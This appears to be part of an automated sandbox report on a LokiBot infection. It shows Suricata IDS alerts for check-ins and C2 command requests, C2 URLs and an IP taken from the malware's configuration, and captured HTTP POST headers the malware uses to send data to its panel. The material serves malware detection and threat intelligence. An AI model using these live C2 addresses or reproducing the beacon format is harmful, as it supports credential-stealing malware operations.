Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49970 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50000 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49875 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49875 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49970 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49807 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49970 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49853 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49807 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49826 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49807 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49883
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49965 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49826 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49932 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49894 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49807 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49814 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49807 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49990 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49970 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49984 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49926 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49853 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49917 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49851 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49965 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49894 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49894 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49965 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50000 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49814 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49814 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49990 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49990 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49965 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49826
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49970 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49984 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49926 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49758 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49807
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49851 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49853
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49981 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50000 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49894 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49762
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49907 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49907 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49965 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49913
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49990 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49984 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49814 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49814 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50000 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50000 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49984 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49741
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49894 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49917 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49990 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49926 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49758 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49775
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49907 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49894
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49851
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49878 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49875
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49907 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49878 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49878 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49984 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49981 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49917 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49970
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49902 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49907 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49926 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49917 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49981
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49902 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49984
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49758
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49965
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49902 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49990
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49878 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49858 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49839 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49814
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49839 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49858 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49858 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49926 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49878 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49957 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49957 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49926
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49932
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49839 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49907
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49917
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49902 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49839 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49839 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49957 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49902 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49961 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49858 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49961 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49961 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49820 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49820 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49820 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49942 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49858 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49957 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49957 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49995 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49839
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49942 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49902
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49878
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49961 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49995 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49945 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49945 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49945 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49942 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49961 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49995 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49957
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49820 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49820 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49820
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49858
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49951 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49951 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49951 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49942 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49945 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49942 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49889 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49951 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49961
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49995 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49951 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49995 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49889 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49945 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49889 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49951
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49942
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49995
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49889 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49889 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49945
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49937 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49937 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49937 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49976 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49976 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49976 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49889
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49937 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49937 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49976 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49976 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49976
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49937
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:50000

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: 94.156.177.41/maxzi/five/fre.php

Source: Joe Sandbox View

IP Address: 94.156.177.41 94.156.177.41

Source: Joe Sandbox View

ASN Name: NET1-ASBG NET1-ASBG

Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
